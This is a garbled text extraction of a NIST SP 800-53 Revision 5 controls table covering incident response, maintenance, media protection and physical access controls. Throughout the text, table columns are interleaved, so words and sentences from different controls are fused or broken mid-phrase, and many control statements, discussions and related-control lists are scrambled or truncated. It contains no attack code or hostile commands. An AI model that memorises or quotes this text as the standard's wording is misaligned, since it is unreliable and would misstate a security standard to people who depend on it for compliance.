IR-3(1) Incident Response Testing | Automated Testing Test the incident response capability using [Assignment: organization-defined automated Organizations
potentially use automated
accesses personallymechanismsidentifiable to more thoroughly
information and effectively
or an authorized test incident
user accesses or None.
IR-3(2) Incident Response Testing | Coordination with Related Plans mechanisms].
Coordinate incident response testing with organizational elements responsible for related plans. response
Organizationalcapabilities.
plans related This can tobe accomplished
incident responsebytesting providingincludemore complete
business coverage
continuity of incident
plans, disaster None.
response
recovery issues,continuity
plans, selecting realisticof operations test scenarios
plans, and environments,
contingency plans, crisis andcommunications
stressing the response plans,
IR-3(3) Incident Response Testing | Continuous Improvement Use qualitative and quantitative data from testing to: To help
capability.incident response activities function as intended, organizations may use metrics and None.
(a)Implement
Determinean theincident
effectiveness of incident critical infrastructure plans, and occupant emergency plans.
IR-4 Incident Handling a. handling capabilityresponse processes;
for incidents that is consistent with the incident evaluation
Organizations criteria to assess
recognize thatincident
incidentresponseresponseprograms capabilities as are
partdependent
of an efforton tothecontinually
capabilities improve
of orga AC-19, AU-6, AU-7, CM-6, CP-2, CP-3, CP-4, IR-2, IR-3, IR-5, IR-6, IR-8, PE-6, PL-2, PM-12,
response plan and includes preparation, detection and analysis, containment, eradication, and response performance. These efforts facilitate improvement in incident response efficacy and SA-8,
IR-4(1) Incident Handling | Automated Incident Handling Processes Support the incident handling process using [Assignment: organization-defined automated Automated
lessen the impactmechanismsof incidents. that support incident handling processes include online incident None.SC-5, SC-7, SI-3, SI-4, SI-7.
recovery;
mechanisms]. management systems andincludes tools that support
IR-4(2) Incident Handling | Dynamic Reconfiguration Include the following types of dynamic reconfiguration for [Assignment: organization-defined systemDynamic reconfiguration changes to the
router collection of livecontrol
rules, access response data,
lists, full network
intrusion detection or AC-2, AC-4, CM-2.
packet capture, and forensic analysis.
IR-4(3) Incident Handling | Continuity of Operations Identify [Assignment: organization-defined classes of incidents] and take the following actions in Classes of incidents include malfunctions due to design or implementation errors and omissions, None.
IR-4(4) Incident Handling | Information Correlation response to
Correlate those incidents
incident information to ensure continuation
and individual incidentof organizational missionanand
responses to achieve business
organization-wide targeted malicious
Sometimes, a threatattacks,event, and suchuntargeted
as a hostilemaliciouscyber-attack, attacks.canIncident
only be observedresponse by actions
bringinginclude None.
functions:
perspective[Assignment: organization-defined actions to take in response to classes of incidents]. orderly
togethersystem degradation, system shutdown, fall backvarious
to manual mode or activationprocedures of alternative
IR-4(5) Incident Handling | Automatic Disabling of System Implement aon incident awareness
configurable capabilityand response.
to automatically disable the system if [Assignment: Organizations
technology
information
consider
whereby
from
the whetherdifferent
system the
operates
sources, including
capability to automatically
differently, employing
reports
disable
deceptive
and
the reporting
system
measures, conflicts
alternate with None.
organization-defined security violations] are detected. establishedofbyoperations
continuity organizations. requirements specified as part of CP-2 or IR-4(3). Security violations include
IR-4(6) Incident Handling | Insider Threats Implement an incident handling capability for incidents involving insider threats. Explicit focus on handling incidents involving insider threats provides additional emphasis on this None.
cyber-attacks
type of threat that
andfor have
theinsider compromised
need for specific the integrity
incident of the capabilities
handling system or exfiltratedto provide organizational
appropriate and
IR-4(7) Incident Handling | Insider Threats — Intra-organization Coordination Coordinate an incident handling capability for insider threats that includes the following Incident
information handling
and serious errors threat
in incidents
software (e.g.,
programs preparation,
that could detection
adversely and
impact analysis,
organizational None.
organizational entities [Assignment: organization-defined entities]. timely responses.
IR-4(8) Incident Handling | Correlation with External Organizations Coordinate with [Assignment: organization-defined external organizations] to correlate and share [A containment,
The coordination eradication,
of incident and recovery) requires
information with external coordination among many organizational
organizations—including entities, pa
mission or business AU-16, PM-16.
including mission or business owners, system owners, human resources offices, procurement
IR-4(9) Incident Handling | Dynamic Response Capability Employ [Assignment: organization-defined dynamic response capabilities] to respond to incidents. The dynamic response capability addresses the timely deployment
offices, personnel offices, physical security offices, senior agency information security officer, of new or replacement None.
IR-4(10) Incident Handling | Supply Chain Coordination Coordinate incident handling activities involving supply chain events with other organizations involveOrganizations organizational involved capabilities in response
in supply chain to incidents.
activities This product
include includesdevelopers,
capabilities system implemented integrators,at thema CA-3, MA-2, SA-9, SR-8.
mission and business process level and at the system level.
IR-4(11) Incident Handling | Integrated Incident Response Team Establish and maintain an integrated incident response team that can be deployed to any location ideAn integrated incident response team is a team of experts that assesses, documents, and responds AT-3.
IR-4(12) Incident Handling | Malicious Code and Forensic Analysis Analyze malicious code and/or other residual artifacts remaining in the system after the incident. to incidents
When conducted so that organizational
carefully in an isolatedsystems and networks
environment, can recover
analysis of malicious quicklycode and and implement the
other residual None.
necessaryofcontrols
artifacts a security to incident
avoid future incidents. Incident response team personnel include forensic
tactics, and None.
IR-4(13) Incident Handling | Behavior Analysis Analyze anomalous or suspected adversarial behavior in or related to [Assignment: organization- If the organization
malicious code maintains
analysts, tool It aor breach
deception
developers,
can give
environment,
systems
the organization
securityan andanalysis insight
of behaviorsinto adversaryinand
thatreal-time
defined environments or resources]. techniques,
environment, and procedures.
including resources cantargeted
also indicate by the the identity
adversary or privacy
and some
timing
engineers,
defining
of the characteristics
incident or of the
event, can
IR-4(14) Incident Handling | Security Operations Center Establish and maintain a security operations center. A security operations
adversary. In addition, center
malicious (SOC) codeis the focal point
analysis can help for security operations
the organization and computer
develop network None.
provide
defense insight
for an for into adversarial
organization. Thetactics,
purpose techniques,
of the SOCand procedures.
is to defend andExternal
monitor toana responses
deception to
organization’s
IR-4(15) Incident Handling | Public Relations and Reputation Repair (a) Manage public relations associated with an incident; and It is important
environment, an organization
the analysis to haveadversarial
a strategy in place for addressing incidents that have None.
(b) Employ measures incidents.
to repair the reputation of the organization. systems
been and networks
brought to the attention (i.e.,ofcyber
anomalousinfrastructure)
ofmaintaining
the general records
public, on anbehavior
haveongoing
cast
(e.g.,
basis.
the
changes
The SOC
organization
in system
isinalso performance
responsible
a negative light, aAU-6, AU-7, IR-4, IR-6, IR-8, PE-6, PM-5, SC-5, SC-7, SI-3, SI-4, SI-7.
IR-5 Incident Monitoring Track and document Documenting
for detecting, incidents
analyzing, includes
and responding to cybersecurity about each
incidents incident,
in a timely the status
manner. of The
the incident,
or have affected the organization’s constituents (e.g., partners, customers). Such publicity can be
IR-5(1) Incident Monitoring | Automated Tracking, Data Collection, and Analysis Track incidents and collect and analyze incident information using [Assignment: organization- Automated mechanisms for tracking incidents and collecting
extremely harmful to the organization and affect its ability to carry out its mission and business and analyzing incident information None.
IR-6 Incident Reporting defined
a. automated
Require personnelmechanisms].
to report suspected incidents to the organizational incident response include
The types Computer
of incidents Incident reported,Response Centersand
the content or other electronic
timeliness of thedatabases
reports, and of incidents
the designated and reportin CM-6, CP-2, IR-4, IR-5, IR-8, IR-9.
capability within [Assignment: organization-defined time period]; and network monitoring devices.
IR-6(1) Incident Reporting | Automated Reporting Report incidents using [Assignment: organization-defined automated mechanisms]. The recipients of incident reports are specified in IR-6b. Automated reporting mechanisms include e IR-7.
IR-6(2) Incident Reporting | Vulnerabilities Related to Incidents Report system vulnerabilities associated with reported incidents to [Assignment: organization- Reported incidents that uncover system vulnerabilities are analyzed by organizational personnel None.
IR-6(3) Incident Reporting | Supply Chain Coordination defined personnel
Provide incident or roles]. to the provider of the product or service and other organizations invol including
information Organizations system owners,
involved missionchain
in supply and business
activitiesowners, senior agency
include product developers, information systemsecurityintegrators,officers,
manSR-8.
senior agency officials for privacy, authorizing officials, and the risk executive (function). The
IR-7 Incident Response Assistance Provide an incident response support resource, integral to the organizational incident response capabil Incident response support resources provided by organizations
analysis can serve to prioritize and initiate mitigation actions to address the discovered system include help desks, assistance groups, AT-2, AT-3, IR-4, IR-6, IR-8, PM-22, PM-26, SA-9, SI-18.
IR-7(1) Incident Response Assistance | Automation Support for Availability of Information and Support Increase the availability of incident response information and support using [Assignment: Automated mechanisms can provide a push or pull capability for users to obtain incident response None.
IR-7(2) Incident Response Assistance | Coordination with External Providers organization-defined automated mechanisms]. assistance. For example, individuals
(a) Establish a direct, cooperative relationship between its incident response capability and external External providers of a system protection capability include the Computer Network Defense may have access to a website to query the assistance capability, None.
providers or the assistance capability can proactively send incident
Externalresponse information to users (general
IR-8 Incident Response Plan a. Developofansystem
incident protection
responsecapability;
plan that:and program withinthat
It is important
distribution
the
or targeted)
U.S. Department
organizations
as part ofdevelop
of Defense.
increasing andunderstanding
implement aproviders
coordinated helpapproach
to protect, tomonitor,
incidentand response.
AC-2, CP-2, CP-4, IR-4, IR-7, IR-9, PE-6, PL-2, SA-15, SI-12, SR-8.
1. Provides analyze, detect, and respond to unauthorized activity within of current response
organizational informationcapabilities
systems
IR-8(1) Incident Response Plan | Breaches Include the the organization
following with a roadmap
in the Incident Response forPlan
implementing
for breaches itsinvolving
incident personally
response capability;
identifiable Organizations
and networks. may It may bebe required
beneficial by law,to haveregulation,
agreements or policy to follow
in place specific procedures
with external providers torelating clarify to PT-1, PT-2, PT-3, PT-4, PT-5, PT-7.
IR-9 Information Spillage Response information:
Respond to information spills by: Information spillage refers to instances where information is placed on systems that are not authorizeCP-2, IR-6, PM-26, PM-27, PT-2, PT-3, PT-7, RA-7.
IR-10 Integrated Information Security Analysis Team a. Assigning [Assignment:
[Withdrawn: Moved to IR-4(11).] organization-defined personnel or roles] with responsibility for
responding to information spills;
IR-9(2) Information Spillage Response | Training Provide information spillage response training [Assignment: organization-defined frequency]. Organizations establish requirements for responding to information spillage incidents in incident respAT-2, AT-3, CP-3, IR-2.
IR-9(3) Information Spillage Response | Post-spill Operations Implement the following procedures to ensure that organizational personnel impacted by Corrective actions for systems contaminated due to information spillages may be time-consuming. None.
IR-9(4) Information Spillage Response | Exposure to Unauthorized Personnel information spills can controls
Employ the following continuefor to personnel
carry out assigned
exposedtasks while contaminated
to information not within systems
assignedareaccess Personnel
Controls includemay not have access
ensuring to the contaminated
that personnel who are exposed systems to while
spilledcorrective
information actionsare madeare beingaware of None.
undergoing corrective
authorizations: [Assignment:actions:organization-defined
[Assignment: organization-defined
controls]. procedures]. taken,
the which
laws, may potentially
executive affect their
orders, directives, ability to conduct
regulations, policies, organizational
standards, andbusiness. guidelines regarding the
IR-9(1) Information Spillage Response | Responsible Personnel [Withdrawn: Incorporated into IR-9.]
information and the restrictions imposed based on exposure to such information.
MA-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: Maintenance policy and procedures address the controls in the MA family that are implemented within PM-9,
s PS-8, SI-12.
MA-2 Controlled Maintenance 1. [Selection document,
a. Schedule, (one or more): and Organization-level; Mission/business
review records of maintenance, repair,process-level; System-level]
and replacement on system Controlling system maintenance addresses the information security aspects of the system maintenanc CM-2, CM-3, CM-4, CM-5, CM-8, MA-4, MP-6, PE-16, SI-2, SR-3, SR-4, SR-11.
maintenance
components policy that: with manufacturer or vendor specifications and/or organizational
MA-2(1) Controlled Maintenance | Record Content [Withdrawn: in accordance
Incorporated into MA-2.]
requirements;
MA-2(2) Controlled Maintenance | Automated Maintenance Activities (a) Schedule, conduct, and document maintenance, repair, and replacement actions for the system The use of automated mechanisms to manage and control system maintenance programs and activities MA-3.
MA-3 Maintenance Tools using [Assignment:
a. Approve, control,organization-defined
and monitor the use automated mechanisms];tools;
of system maintenance and and Approving, controlling, monitoring, and reviewing maintenance tools address security-related issues MA-2, PE-16.
MA-3(1) Maintenance Tools | Inspect Tools b. Review
Inspect thepreviously
maintenance approved
tools usedsystem by maintenance
maintenance tools [Assignment:
personnel organization-defined
for improper or unauthorized modificMaintenance tools can be directly brought into a facility by maintenance personnel or downloaded fro SI-7.
frequency].
MA-3(2) Maintenance Tools | Inspect Media Check media containing diagnostic and test programs for malicious code before the media are used i If, upon inspection of media containing maintenance, diagnostic, and test programs, organizations deSI-3.
MA-3(3) Maintenance Tools | Prevent Unauthorized Removal Prevent the removal of maintenance equipment containing organizational information by: Organizational information includes all information owned by organizations and any information provMP-6.
MA-3(4) Maintenance Tools | Restricted Tool Use (a) Verifying
Restrict the usethatofthere is no organizational
maintenance information
tools to authorized contained
personnel only.on the equipment; Restricting the use of maintenance tools to only authorized personnel applies to systems that are us AC-3, AC-5, AC-6.
MA-3(5) Maintenance Tools | Execution with Privilege Monitor the use of maintenance tools that execute with increased privilege. Maintenance tools that execute with increased system privilege can result in unauthorized access to AC-3, AC-6.
MA-3(6) Maintenance Tools | Software Updates and Patches Inspect maintenance tools to ensure the latest software updates and patches are installed. Maintenance tools using outdated and/or unpatched software can provide a threat vector for adversarie AC-3, AC-6.
MA-4 Nonlocal Maintenance a. Approve and monitor nonlocal maintenance and diagnostic activities; Nonlocal maintenance and diagnostic activities are conducted by individuals who communicate through AC-2, AC-3, AC-6, AC-17, AU-2, AU-3, IA-2, IA-4, IA-5, IA-8, MA-2, MA-5, PL-2, SC-7, SC-10.
MA-4(1) Nonlocal Maintenance | Logging and Review b. Allow the use of nonlocal maintenance and diagnostic tools only as
(a) Log [Assignment: organization-defined audit events] for nonlocal maintenance and diagnostic consistent with organizational Audit logging for nonlocal maintenance is enforced by AU-2. Audit events are defined in AU-2a. AU-6, AU-12.
policy andand
sessions; documented in the security plan for the system;
MA-4(2) Nonlocal Maintenance | Document Nonlocal Maintenance [Withdrawn: Incorporated into MA-1 and MA-4.]
MA-4(3) Nonlocal Maintenance | Comparable Security and Sanitization (a) Require that nonlocal maintenance and diagnostic services be performed from a system that Comparable security capability on systems, diagnostic tools, and equipment providing maintenance se MP-6, SI-3, SI-7.
MA-4(4) Nonlocal Maintenance | Authentication and Separation of Maintenance Sessions implements
Protect a security
nonlocal capability
maintenance comparable
sessions by: to the capability implemented on the system being Communications paths can be logically separated using encryption. None.
serviced;
(a) Requireor [Assignment: organization-defined authenticators that are replay resistant]; and
Employing
MA-4(5) Nonlocal Maintenance | Approvals and Notifications (a) the approval of each nonlocal maintenance session by [Assignment: organization- Notification may be performed by maintenance personnel. Approval of nonlocal maintenance is None.
MA-4(6) Nonlocal Maintenance | Cryptographic Protection defined personnel or roles]; and
Implement the following cryptographic mechanisms to protect the integrity and confidentiality of accomplished by personnel with sufficient information security
Failure to protect nonlocal maintenance and diagnostic communications can result in unauthorized indi and system knowledge to determine SC-8, SC-12, SC-13.
the appropriateness of the proposed maintenance.
MA-4(7) Nonlocal Maintenance | Disconnect Verification Verify session and network connection termination after the completion of nonlocal maintenance andVerifying the termination of a connection once maintenance is completed ensures that connections eAC-12.
MA-5 Maintenance Personnel a. Establish a process for maintenance personnel authorization and maintain a list of authorized Maintenance personnel refers to individuals who perform hardware or software maintenance on organiz AC-2, AC-3, AC-5, AC-6, IA-2, IA-8, MA-4, MP-2, PE-2, PE-3, PS-7, RA-3.
MA-5(1) Maintenance Personnel | Individuals Without Appropriate Access maintenance
(a) Implementorganizations
procedures for or the
personnel;
use of maintenance personnel that lack appropriate security Procedures for individuals who lack appropriate security clearances or who are not U.S. citizens are MP-6, PL-2.
MA-5(2) Maintenance Personnel | Security Clearances for Classified Systems clearances or are not U.S.
Verify that personnel citizens,maintenance
performing that include and
the following
diagnosticrequirements:
activities on a system processing, storinPersonnel who conduct maintenance on organizational systems may be exposed to classified information PS-3.
MA-5(3) Maintenance Personnel | Citizenship Requirements for Classified Systems Verify that personnel performing maintenance and diagnostic activities on a system processing, storing, Personnel who conduct maintenance on organizational systems may be exposed to classified information PS-3.

6 of 2021-01-21
 NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

MA-5(4) Maintenance Personnel | Foreign Nationals Ensure that: Personnel who conduct maintenance and diagnostic activities on organizational systems may be exposed PS-3.
MA-5(5) Maintenance Personnel | Non-system Maintenance (a) Foreign
Ensure thatnationals
non-escorted with appropriate security clearances
personnel performing maintenance are used to conduct
activities maintenance
not directly associatedandwith Personnel who perform maintenance activities in other capacities not directly related to the system None.
diagnostic
the system activities
but in theonphysical
classified systemsofonly
proximity thewhen
system,thehave
systems are jointly
required accessowned and operated by include physical plant personnel and custodial personnel.
authorizations.
MA-6 Timely Maintenance Obtain
the maintenance
United States andsupport
foreignand/or spare parts
allied governments, foror[Assignment: organization-defined
owned and operated system
solely by foreign compone
allied Organizations specify the system components that result in increased risk to organizational operatio CM-8, CP-2, CP-7, RA-7, SA-15, SI-13, SR-2, SR-3, SR-4.
MA-6(1) Timely Maintenance | Preventive Maintenance governments;
Perform and maintenance on [Assignment: organization-defined system components] at
preventive Preventive maintenance includes proactive care and the servicing of system components to None.
MA-6(2) Timely Maintenance | Predictive Maintenance [Assignment:
Perform organization-defined
predictive maintenance ontime intervals].organization-defined system components] at
[Assignment: maintain organizational
Predictive maintenance equipment evaluates the and facilitiesof
condition in equipment
satisfactoryby operating
performing condition.
periodicSuch or continuous None.
[Assignment: organization-defined time maintenance provides for the monitoring.
systematic inspection, tests, measurements, adjustments, parts
MA-6(3) Timely Maintenance | Automated Support for Predictive Maintenance Transfer predictive maintenance data tointervals].
a maintenance management system using [Assignment: (online)
A
replacement,
equipment
computerized detection,
condition
maintenance and management
correction of
The goal of
system
incipient
predictive
maintains
failures either
maintenance
a database
before
is to perform
of information
they occur or aboutthey
before the None.
organization-defined automated mechanisms]. maintenance operationsat a scheduled time when the maintenance activity is mostof cost-effective and before
MA-7 Field Maintenance Restrict or prohibit field maintenance on [Assignment: organization-defined systems or system compomaintenance Fieldequipment
the maintenance loses is the of organizations
type
performance of maintenance
within
and automates
conducted
a threshold. Theon
the aprocessing
systemcomponent
predictive
equipment
or system component condition
of predictive after theMA-2,
syst MA-4, MA-5.
data to trigger maintenance planning, execution, and reporting.
MP-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: Media protection policy and procedures address the controls in the MP family that are implemented wit PM-9, PS-8, SI-12.
MP-2 Media Access 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level] media
Restrict access to [Assignment: organization-defined types of digital and/or non-digital media] to [As System media includes digital and non-digital media. Digital media includes flash drives, diskettes, maAC-19, AU-9, CP-2, CP-9, CP-10, MA-5, MP-4, MP-6, PE-2, PE-3, SC-12, SC-13, SC-34, SI-12.
protection policy that:
MP-2(1) Media Access | Automated Restricted Access [Withdrawn: Incorporated into MP-4(2).]
MP-2(2) Media Access | Cryptographic Protection [Withdrawn: Incorporated into SC-28(1).]
MP-3 Media Marking a. Mark system media indicating the distribution limitations, handling caveats, and applicable Security marking refers to the application or use of human-readable security attributes. Digital mediaAC-16, CP-9, MP-5, PE-22, SI-12.
MP-4 Media Storage security
a. markings
Physically control (if and
any)securely
of the information;
store [Assignment:and organization-defined types of digital and/or System media includes digital and non-digital media. Digital media includes flash drives, diskettes, m AC-19, CP-2, CP-6, CP-9, CP-10, MP-2, MP-7, PE-3, PL-2, SC-12, SC-13, SC-28, SC-34, SI-12.
MP-4(1) Media Storage | Cryptographic Protection non-digital
[Withdrawn: media] within [Assignment:
Incorporated into SC-28(1).] organization-defined controlled areas]; and
MP-4(2) Media Storage | Automated Restricted Access Restrict access to media storage areas and log access attempts and access granted using [Assignme Automated mechanisms include keypads, biometric readers, or card readers on the external entries tAC-3, AU-2, AU-6, AU-9, AU-12, PE-3.
MP-5 Media Transport a. Protect and control [Assignment: organization-defined types of system media] during transport System media includes digital and non-digital media. Digital media includes flash drives, diskettes, AC-7, AC-19, CP-2, CP-9, MP-3, MP-4, PE-16, PL-2, SC-12, SC-13, SC-28, SC-34.
MP-5(1) Media Transport | Protection Outside of Controlled Areas outside of controlled
[Withdrawn: Incorporatedareas intousingMP-5.]
[Assignment: organization-defined controls];
MP-5(2) Media Transport | Documentation of Activities [Withdrawn: Incorporated into MP-5.]
MP-5(3) Media Transport | Custodians Employ an identified custodian during transport of system media outside of controlled areas. Identified custodians provide organizations with specific points of contact during the media None.
MP-5(4) Media Transport | Cryptographic Protection [Withdrawn: Incorporated into SC-28(1).] transport process and facilitate individual accountability. Custodial responsibilities can be
transferred from one individual to another if an unambiguous custodian is identified.
MP-6 Media Sanitization a. Sanitize [Assignment: organization-defined system media] prior to disposal, release out of Media sanitization applies to all digital and non-digital system media subject to disposal or reuse, AC-3, AC-7, AU-11, MA-2, MA-3, MA-4, MA-5, PM-22, SI-12, SI-18, SI-19, SR-11.
MP-6(1) Media Sanitization | Review, Approve, Track, Document, and Verify organizational
Review, approve, control,
track,or release for
document, andreuse
verifyusing [Assignment:
media sanitizationorganization-defined
and disposal actions. sanitization Organizations review and approve media to be sanitized to ensure compliance with records None.
techniques and procedures]; and retention
MP-6(2) Media Sanitization | Equipment Testing Test sanitization equipment and procedures [Assignment: organization-defined frequency] to Testing of policies.
sanitizationTracking and documenting
equipment and procedures actions mayinclude listing personnel
be conducted by qualified whoand reviewed and
authorized None.
ensurenondestructive
that the intended sanitization is being to achieved. approved sanitization
external entities, and disposal
including actions, types
federalexternal
agencies of media
or external sanitized,
service files stored on the media,
providers.
MP-6(3) Media Sanitization | Nondestructive Techniques Apply sanitization techniques portable storage devices prior to connecting such sanitizationPortable storage
methods devicesused, include
date and time or of removable
the sanitization hard actions,
disk drives (e.g., solid
personnel whostate, magnetic),
performed the None.
MP-6(4) Media Sanitization | Controlled Unclassified Information devices to the system under
[Withdrawn: Incorporated into MP-6.] the following circumstances: [Assignment: organization-defined optical discs, magnetic or optical tapes, flash memory devices, flash memory cards, and other
circumstances requiring sanitization of portable storage devices]. external or removable disks. Portable storage devices can be obtained from untrustworthy sources
MP-6(5) Media Sanitization | Classified Information [Withdrawn: Incorporated into MP-6.] and contain malicious code that can be inserted into or transferred to organizational systems
MP-6(6) Media Sanitization | Media Destruction [Withdrawn: Incorporated into MP-6.]
MP-6(7) Media Sanitization | Dual Authorization Enforce dual authorization for the sanitization of [Assignment: organization-defined system media]. Organizations employ dual authorization to help ensure that system media sanitization cannot occur AC-3, unl MP-2.
MP-6(8) Media Sanitization | Remote Purging or Wiping of Information Provide the capability to purge or wipe information from [Assignment: organization-defined Remote purging or wiping of information protects information on organizational systems and None.
MP-7 Media Use systems or system
a. [Selection: components]
Restrict; Prohibit] the [Selection: remotely; under
use of [Assignment: the following conditions:
organization-defined [Assignment: system
types of system System components
media includes if systems
both digitalor components
and non-digital are obtained
media. Digital by unauthorized
media includes individuals.
diskettes,Remote
magnetic taAC-19, AC-20, PL-4, PM-12, SC-34, SC-41.
organization-defined
media] on [Assignment: conditions]].
organization-defined systems or system components] using [Assignment: purge or wipe commands require strong authentication to help mitigate the risk of unauthorized
MP-7(1) Media Use | Prohibit Use Without Owner [Withdrawn: Incorporated into MP-7.] individuals purging or wiping the system, component, or device. The purge or wipe function can be
organization-defined controls]; and
MP-7(2) Media Use | Prohibit Use of Sanitization-resistant Media Prohibit the use of sanitization-resistant media in organizational systems. Sanitization resistance refers to how resistant media are to non-destructive sanitization techniques MP-6.
MP-8 Media Downgrading a. Establish [Assignment: organization-defined system media downgrading process] that includes Media downgrading applies to digital and non-digital media subject to release outside of the None.
MP-8(1) Media Downgrading | Documentation of Process employing
Document systemdowngradingmediamechanisms
downgradingwith strength and integrity commensurate with the security Organizations
actions. organization, whether can document the media is considered
the media downgrading removable process or not. When applied
by providing to system
information, media,
such as the None.
category or classification of the information; the downgrading
downgrading processemployed,
technique removes information
the identification from the number media, of typically
the downgradedby security category
media, or
and the
MP-8(2) Media Downgrading | Equipment Testing Test downgrading equipment and procedures [Assignment: organization-defined frequency] to None.
classification level, such that the information cannot be retrieved or reconstructed. Downgrading of None.
ensure that downgrading identity of the individual that authorized and/or performed the downgrading action.
MP-8(3) Media Downgrading | Controlled Unclassified Information Downgrade system mediaactions containingare being achieved.
controlled unclassified information prior to public release. The downgrading of controlled unclassified information uses approved sanitization tools, None.
MP-8(4) Media Downgrading | Classified Information Downgrade system media containing classified information prior to release to individuals without Downgrading techniques, and of procedures.
classified information uses approved sanitization tools, techniques, and procedures None.
PE-1 Policy and Procedures required access authorizations. to transfer information confirmed to be unclassified from
a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: Physical and environmental protection policy and procedures address the controls in the PE family thaAT-3, PM-9, PS-8, SI-12. classified systems to unclassified media.
PE-2 Physical Access Authorizations 1. Develop,
a. [Selectionapprove,
(one or more): Organization-level;
and maintain Mission/business
a list of individuals with authorizedprocess-level;
access toSystem-level]
the facility where Physical access authorizations apply to employees and visitors. Individuals with permanent physical acc AT-3, AU-9, IA-4, MA-5, MP-2, PE-3, PE-4, PE-5, PE-8, PM-12, PS-3, PS-4, PS-5, PS-6.
physical
the systemandresides;
environmental protection policy that:
PE-2(1) Physical Access Authorizations | Access by Position or Role Authorize physical access to the facility where the system resides based on position or role. Role-based facility access includes access by authorized permanent and regular/routine maintenanceAC-2, AC-3, AC-6.
PE-2(2) Physical Access Authorizations | Two Forms of Identification Require two forms of identification from the following forms of identification for visitor access to theAcceptable forms of identification include passports, REAL ID-compliant drivers’ licenses, and PersonaIA-2, IA-4, IA-5.
PE-2(3) Physical Access Authorizations | Restrict Unescorted Access Restrict unescorted access to the facility where the system resides to personnel with [Selection (one Individuals without required security clearances, access approvals, or need to know are escorted by PS-2, PS-6.
PE-3 Physical Access Control a. Enforce physical access authorizations at [Assignment: organization-defined entry and exit points Physical access control applies to employees and visitors. Individuals with permanent physical access AT-3, AU-2, AU-6, AU-9, AU-13, CP-10, IA-3, IA-8, MA-5, MP-2, MP-4, PE-2, PE-4, PE-5, PE-
PE-3(1) Physical Access Control | System Access to the facility
Enforce physical where
accesstheauthorizations
system resides] toby:
the system in addition to the physical access controls for Control of physical access to the system provides additional physical security for those areas within 8, PS-2, PS-3, PS-6, PS-7, RA-3, SC-28, SI-4, SR-3.
None.
PE-3(2) Physical Access Control | Facility and Systems the facility
Perform at [Assignment:
security organization-defined
checks [Assignment: physical spaces
organization-defined containing
frequency] at theone or more
physical perimeter of thefacilities
Organizationswheredetermine
there is a the concentration of system
extent, frequency, components.
and/or randomness of security checks to adequately AC-4, mi SC-7.
components of the system].
PE-3(3) Physical Access Control | Continuous Guards Employ guards to control [Assignment: organization-defined physical access points] to the facility whEmploying guards at selected physical access points to the facility provides a more rapid response capa CP-6, CP-7, PE-6.
PE-3(4) Physical Access Control | Lockable Casings Use lockable physical casings to protect [Assignment: organization-defined system components] The greatest risk from the use of portable devices—such as smart phones, tablets, and notebook None.
PE-3(5) Physical Access Control | Tamper Protection from
Employ unauthorized
[Assignment: physical access.
organization-defined anti-tamper technologies] to [Selection (one or more): de computers—is
Organizations can theft. Organizations
implement tamper candetection
employ lockable,
and prevention physical atcasings
selected tohardware
reduce orcomponents
eliminate theor SA-16,
im SR-9, SR-11.
risk of equipment theft. Such casings come in a variety of sizes, from units that protect a single
PE-10(1) Emergency Shutoff | Accidental and Unauthorized Activation [Withdrawn: Incorporated into PE-10.] notebook computer to full cabinets that can protect multiple servers, computers, and peripherals.
PE-3(7) Physical Access Control | Physical Barriers Limit access using physical barriers. Physical barriers include bollards, concrete slabs, jersey walls, and hydraulic active vehicle barriers. None.
PE-3(8) Physical Access Control | Access Control Vestibules Employ access control vestibules at [Assignment: organization-defined locations within the facility]. An access control vestibule is part of a physical access control system that typically provides a space None.
PE-4 Access Control for Transmission Control physical access to [Assignment: organization-defined system distribution and transmission line between two setsapplied
Security controls of interlocking
to system doors. Vestibules
distribution andare designed tolines
transmission prevent
preventunauthorized
accidental damage, diAT-3, IA-4, MP-2, MP-4, PE-2, PE-3, PE-5, PE-9, SC-7, SC-8.
individuals from following authorized individuals into facilities with controlled access. This activity,
PE-5 Access Control for Output Devices Control physical access to output from [Assignment: organization-defined output devices] to preventControlling also known physical access tooroutput
as piggybacking devices
tailgating, resultsincludes placing output
in unauthorized accessdevices
to theinfacility.
locked Interlocking
rooms or othe PE-2, PE-3, PE-4, PE-18.
PE-13(3) Fire Protection | Automatic Fire Suppression [Withdrawn: Incorporated into PE-13(2).]
PE-5(2) Access Control for Output Devices | Link to Individual Identity Link individual identity to receipt of output from output devices. Methods for linking individual identity to the receipt of output from output devices include None.
PE-18(1) Location of System Components | Facility Site [Withdrawn: Moved to PE-23.] installing security functionality on facsimile machines, copiers, and printers. Such functionality
allows organizations to implement authentication on output devices prior to the release of output
PE-6 Monitoring Physical Access a. Monitor physical access to the facility where the system resides to detect and respond to physical to Physical access monitoring includes publicly accessible areas within organizational facilities. Exampl AU-2, AU-6, AU-9, AU-12, CA-7, CP-10, IR-4, IR-8.
individuals.
PE-6(1) Monitoring Physical Access | Intrusion Alarms and Surveillance Equipment security
Monitor incidents;
physical access to the facility where the system resides using physical intrusion alarms and Physical intrusion alarms can be employed to alert security personnel when unauthorized access to None.
PE-6(2) Monitoring Physical Access | Automated Intrusion Recognition and Responses surveillance equipment. organization-defined classes or types of intrusions] and initiate [Assignmen the
Recognize [Assignment: facilityactions
Response is attempted.
can include Alarmnotifying
systemsselected
work in organizational
conjunction with physicalor
personnel barriers, physical access
law enforcement personnSI-4.
control systems, and security guards by triggering a response when these other forms of security
PE-6(3) Monitoring Physical Access | Video Surveillance (a) Employ video surveillance of [Assignment: organization-defined operational areas]; Videobeen
have surveillance
compromised focusesoron recordingPhysical
breached. activityintrusion
in specified areas
alarms canforinclude
the purposes
different of types
subsequent
of None.
PE-6(4) Monitoring Physical Access | Monitoring Physical Access to Systems (b) Review video recordings [Assignment: organization-defined frequency]; and review, if circumstances so warrant. Video
Monitor physical access to the system in addition to the physical access monitoring of the facility at Monitoring physical access to systems provides additional monitoring for those areas within recordings are typically reviewed to detect anomalous None.
[Assignment: organization-defined physical spaces containing one or more components of the events or incidents. Monitoring the surveillance video is not
facilities where there is a concentration of system components, including server rooms, media required, although organizations may
PE-3(6) Physical Access Control | Facility Penetration Testing [Withdrawn: Incorporated into CA-8.] choose to do so. There may be legal centers.considerations
system]. storage areas, and communications Physicalwhen access performing
monitoring and canretaining video with
be coordinated
PE-8 Visitor Access Records a. Maintain visitor access records to the facility where the system resides for [Assignment: Visitor access
intrusion records
detection includeand
systems thesystem
